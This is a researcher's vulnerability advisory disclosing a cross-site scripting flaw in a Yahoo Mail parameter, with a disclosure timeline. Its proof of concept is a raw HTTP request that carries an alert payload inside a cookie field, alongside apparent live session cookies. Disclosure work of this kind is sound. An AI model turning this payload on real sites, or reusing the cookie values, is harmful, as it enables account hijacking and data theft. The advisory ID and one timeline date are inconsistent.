Advisory: Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com Advisory ID: SSCHADV2013-YahooBB-002 Author: Stefan Schurtz Affected Software: Successfully tested on de-mg42.mail.yahoo.com Vendor URL: http://yahoo.com/ Vendor Status: Not tested anymore Bounty: nothing ========================== Vulnerability Description ========================== The 'intl'-Paramter on "https://de-mg42.mail.yahoo.com/" is prone to a Cross-site Scripting vulnerability ========================== PoC-Exploit ========================== GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr Host: de-mg42.mail.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: YM.SREQs.schurtz=1; YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4& d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV; RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0; POPUPCHECK=1387130698530; adx=c322590@1386248182@1; T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT&a=QAE& sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g--~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-; F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw- &b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN; SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA--& kv=0; ywadp100034076556=3167627385; fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa| ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT; ywadp1000357943879=4084605029; fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879= |8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0; YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1; _br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o &p=m2evvde012000000&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e; U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-& ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3; YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--&d=&f=AAA&t=3bKrSB&s=55nr; DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x Connection: keep-alive ========================== Disclosure Timeline ========================== 15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program) 31-Dec-2013 - next message to the Yahoo Securiy Contact 04-Jan-2014 - feedback from vendor 04-Jan-2014 - vendor informed again about the three vulnerabilities 06-Jan-2014 - feedback from vendor 15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo) 16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last contact ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://yahoo.com/ http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt